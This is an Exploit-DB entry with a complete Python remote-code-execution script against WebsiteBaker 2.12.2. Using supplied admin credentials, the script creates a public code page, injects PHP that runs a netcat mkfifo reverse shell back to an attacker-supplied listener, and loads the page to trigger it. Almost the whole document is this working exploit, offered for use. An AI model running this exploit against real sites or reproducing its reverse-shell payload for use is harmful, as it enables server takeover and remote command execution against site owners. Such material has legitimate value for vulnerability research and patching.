WebsiteBaker 2.12.2 - Remote Code Execution

EDB-ID:

48838

CVE:

N/A


Author:

Enesdex

Type:

webapps


Platform:

PHP

Date:

2020-09-29


# Exploit Title: WebsiteBaker 2.12.2 - Remote Code Execution
# Date: 2020-07-04
# Exploit Author: Selim Enes 'Enesdex' Karaduman
# Vendor Homepage: https://websitebaker.org/pages/en/home.php
# Software Link: https://wiki.websitebaker.org/doku.php/downloads
# Version: 2.12.2
# Tested on: Windows 10 and Ubuntu 18.04 
# Note : You start listener before execute (e.g netcat) then procide listener ip and port

import requests
import re
from bs4 import BeautifulSoup
import sys
import getopt

options, remainder = getopt.gnu_getopt(sys.argv[1:], 'ht:u:p:i:l:',['lhost=','lport='])

for opt, arg in options:
    if opt in ('-h'): 
        print('Usage: python exploit.py -t TARGET_URL -u USERNAME -p PASSWORD --lhost LISTENER_IP --lport LISTENER_PORT')
        exit()
    elif opt in ('-t'):
        main_url = arg
    elif opt in ('-u'):
        usr = arg
    elif opt in ('-p'):
        passwd = arg
    elif opt in ('-i', '--lhost'):
    	lhost = arg
    elif opt in ('-l' , '--lport'):
    	lport = arg

reverse_shell_code = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc"+" "+lhost+" "+lport +" "+">/tmp/f"
shell_code_eval = "echo system('"+ reverse_shell_code + "');"


print("Exploit Author: Selim Enes 'Enesdex' Karaduman" + " " + "@enesdex" + "\n")
##LOGIN PAGE HTML PARSE FOR LOGIN PARAMS
url = main_url+"/admin/login/index.php"
req = requests.get(url)

login_page = req.text
soup = BeautifulSoup(login_page, 'html.parser')
username_par = soup.find_all(attrs={"type" : "hidden"})[1]['value']
password_par = soup.find_all(attrs={"type" : "hidden"})[2]['value']
weird_par = soup.find_all(attrs={"type" : "hidden"})[3]['name']
weird_val = soup.find_all(attrs={"type" : "hidden"})[3]['value']

#LOGIN TO GET SESSIoN_COOKIE
login_page = requests.Session()

burp0_url = main_url+"/admin/login/index.php"
burp0_headers = {"Content-Type": "application/x-www-form-urlencoded"}
burp0_data = {"url": '', "username_fieldname": username_par, "password_fieldname": password_par, weird_par : weird_val, username_par : usr,  password_par : passwd, "submit": ''}
r = login_page.post(burp0_url, headers=burp0_headers, data=burp0_data,allow_redirects = False)

cok = r.headers['Set-Cookie']
cok = cok.split(' ')[0]  
cookie_par = cok.split('=')[0]
cookie_val = cok.split('=')[1].replace(';','')
session_cookie = cookie_par + "=" + cookie_val


##ADD PAGE HTML PARSE FOR CREATE PAGE PARAMS
url = main_url+"/admin/pages/index.php"
cookies = {cookie_par : cookie_val}
req = requests.get(url, cookies=cookies)
create_page = req.text
soup = BeautifulSoup(create_page, 'html.parser')
weird_par1 = soup.find_all(attrs={"type" : "hidden"})[0]['name']
weird_val1 = soup.find_all(attrs={"type" : "hidden"})[0]['value']

##Create Code Page to Put Shell Code
create_page = requests.session()

burp0_url = main_url+"/admin/pages/add.php"
burp0_cookies = {cookie_par : cookie_val}
burp0_headers = {"Content-Type": "application/x-www-form-urlencoded"}
burp0_data = {weird_par1: weird_val1, "title": "exploit-shell", "type": "code", "parent": "0", "visibility": "public", "submit": "Add"}
c = create_page.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)

##FIND THE PAGE ID
url = main_url+"/admin/pages/index.php"
cookies = {cookie_par : cookie_val}
req = requests.get(url, cookies=cookies)
find_id = req.text
soup = BeautifulSoup(find_id, 'html.parser')
pageid = soup.find_all('option',string='exploit-shell')[0]['value']

##HTML PARSE TO PUT SHELL CODE
url = main_url+'/admin/pages/modify.php?page_id='+pageid
cookies = {cookie_par : cookie_val}
req = requests.get(url, cookies=cookies)
add_shellcode = req.text
soup = BeautifulSoup(add_shellcode, 'html.parser')
weird_par2 = soup.find_all(attrs={"type" : "hidden"})[3]['name']
weird_val2 = soup.find_all(attrs={"type" : "hidden"})[3]['value']

##ADD SHELL CODE
session = requests.session()

burp0_url = main_url+"/modules/code/save.php"
burp0_cookies = {cookie_par : cookie_val}
burp0_headers = {"Content-Type": "application/x-www-form-urlencoded"}
burp0_data = {"page_id": pageid, "section_id": pageid, weird_par2: weird_val2, "content": shell_code_eval}
a = session.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)

last_req = requests.get(main_url+"/pages/exploit-shell.php", cookies=cookies)